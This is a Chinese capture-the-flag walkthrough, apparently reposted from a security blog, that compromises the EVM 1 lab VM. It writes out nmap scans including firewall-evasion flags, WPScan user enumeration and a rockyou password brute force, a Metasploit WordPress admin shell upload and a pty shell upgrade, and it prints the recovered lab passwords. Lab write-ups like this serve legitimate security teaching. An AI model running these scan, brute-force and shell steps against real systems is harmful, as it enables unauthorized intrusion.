Vulhub系列:EVM 1

0x00 技术点

  • Nmap端口扫描、目录发现、漏洞探测
  • Wpscan用户枚举、密码爆破
  • Meterpreter shell
  • 权限提升

0x01 环境搭建

靶机信息:

  • Name: EVM: 1
  • Date release: 2 Nov 2019

靶机描述:

This is super friendly box intended for Beginner's This may work better with VirtualBox than VMware

下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置

0x02 信息收集

主机发现

netdiscover -i eth0 #选择仅主机模式网口  IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:15      1      60  Unknown vendor 192.168.56.100  08:00:27:30:bc:cb      1      60  PCS Systemtechnik GmbH 

Kali机器的IP为 192.168.56.101 ,以上探测到的 192.168.56.100就是EVM了

端口扫描

nmap -sV -p- 192.168.56.101Host is up (0.00023s latency).All 65535 scanned ports on 192.168.56.100 are filtered

所有端口被过滤了,怀疑EVM上设置了端口流量防火墙策略

进行 Evade Firewall/IDS扫描

nmap -sA 192.168.56.100 #ACK扫描nmap -sW 192.168.56.100 #TCP窗口扫描nmap -f 192.168.56.100  #报文分段nmap --spoof-mac Cisco 192.168.56.100 #伪造mac

均宣告失败,这个确定是初级难度?

排查一遍之后,发现是EVM虚拟机导入的时候新增NAT网卡致使网络设置未生效,嘤嘤嘤

重新导入,重新以上步骤

netdisvover -i eth0
192.168.56.1    0a:00:27:00:00:15      1      60  Unknown vendor192.168.56.100  08:00:27:ca:fe:db      1      60  PCS Systemtechnik GmbH      192.168.56.103  08:00:27:6d:a5:91      3     180  PCS Systemtechnik GmbH

EVM的正确IP为 192.168.56.103 ,以下进行端口扫描

nmap -sV -p- 192.168.56.103
PORT      STATE SERVICE  VERSION22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))110/tcp open  pop3        Dovecot pop3d139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open  imap        Dovecot imapd445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

目录遍历

先使用nmap枚举一下可发现目录

nmap --script=http-enum 192.168.56.103
|   /wordpress/: Blog|   /info.php: Possible information file|_  /wordpress/wp-login.php: Wordpress login page.

0x03 漏洞发现

nmap vulners

先使用nmap vuln脚本探测一下

nmap --script=smb-check-vulns.nse -p445 192.168.56.103nmap --script=http-enum 192.168.56.103nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.56.103

均无效,使用vulners脚本检测一下是否存在CVE

cd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.gitgit clone https://github.com/scipag/vulscan.gitproxychains git clone https://github.com/scipag/vulscan.gitcd vulscan/utilities/updaterchmod +x updateFiles.sh | ./updateFiles.sh
nmap --script nmap-vulners -sV 192.168.56.103

看起来很多,测试了最新几个CVE,均无法利用

wpscan

之前目录遍历,收集到wordpress路径,自然而然想到用wpscan探测一番

wpscan --url http://192.168.56.103/wordpress/ -e u -e at -e ap

以上命令的含义为枚举所有用户名,安装主题、插件

发现用户:c0rrupt3d_brain

wp版本5.2.4,安装默认主题,未安装插件

搜索一下wordpress 5.2.4有无漏洞

浏览了一下基本上没有可获得shell的漏洞

0x04 漏洞利用

以上获取了wp的用户名,接下来使用wpscan对其进行密码爆破,字典当然选择Kali下最强大的字典rockyou

wpscan --url http://192.168.56.103/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

成功获取到c0rrupt3d_brain用户的密码:24992499

获得访问权限后,我们可以使用metasploit上集成的wpadminshell_upload上传shellcode

演示如下

0x05 权限提升

以上步骤,我们已经获得了EVM的普通用户shell,接下来做提权操作,首先提权

  1. 查看关键文件
  2. 查看内核版本:uname -r → searchsploit
  3. 查看计划任务:crontab -l
  4. 查看历史记录:cat ~/.bash_history
  5. 查看用户权限:sudo -l
  6. 使用提权脚本

先获取一个标准shell

  • python一句话:python -c "import pty;pty.spawn('/bin/bash')"

查看关键文件

好家伙,一步搞定,root用户的密码是:willy26

切换root用户

到此为止

本文分享自微信公众号 - Ms08067安全实验室(Ms08067_com)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏HACK学习

实战渗透 | 向吃鸡外挂站开炮(二)

这种卖黑号的通常都是跟各种hc商勾结在一起,用木马盗取用户账号,然后再出售账号让孤儿开挂。

23330
来自专栏Opensoure翻译

如何通过SSH进入正在运行的容器【Containers】

容器已经改变了我们对虚拟化的思考方式。您可能还记得从虚拟化BIOS,操作系统和内核到每个虚拟化网络接口控制器(NIC)的虚拟机已满堆栈的日子(或者您可能还活着)...

8600
来自专栏Python无止境

不想装系统,有没有办法在线体验 Linux?

另外,这次分享还有承上启下的作用。承上是前几天挺受大家欢迎的《Android 手机如何改造成 Linux 服务器?》,启下是想预告:从明天开始,我会在每次发文的...

15310
来自专栏WalkingCloud

CentOS7下安装MongoDB数据库

MongoDB是一个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。

8720
来自专栏DevOps持续集成

Jenkins流水线环境变量权威指南

欢迎来到“Jenkins CookBook”系列的第一篇博客文章。今天,我们专注于有效地使用Jenkins Pipeline环境变量。您将学习如何定义env变量...

9110
来自专栏idba

工具|学习RPM打包

不同公司有不同的规范来约束各种linux系统软件安装的路径以及相关配套设施。因此我们可以基于各自的 规范 使用rpm 将各种软件的二进制文件打包来满足各自的定制...

5100
来自专栏Jerry的SAP技术分享

介绍一个免费的云开发工具:Cloud Shell

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

10710
来自专栏FreeBuf

数据库安全能力:安全威胁TOP5

在数据库的安全问题已跃至CSO的工作内容象限榜首的今天,对数据库安全的防御是艰苦的旅程,如何让针对业务安全和数据安全的攻击成为一场废鞋底的马拉松,防止恶意行为者...

6500
来自专栏全栈修炼

WebKit 架构与模块

此文章是我最近在看的【WebKit 技术内幕】一书的一些理解和做的笔记。 而【WebKit 技术内幕】是基于 WebKit 的 Chromium 项目的讲解。

6430
来自专栏云原生实验室

Linux Capabilities 入门:如何管理文件的 capabilities?

上篇文章介绍了 Linux capabilities 的诞生背景和基本原理,本文将会通过具体的示例来展示如何查看和设置文件的 capabilities。

8610

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励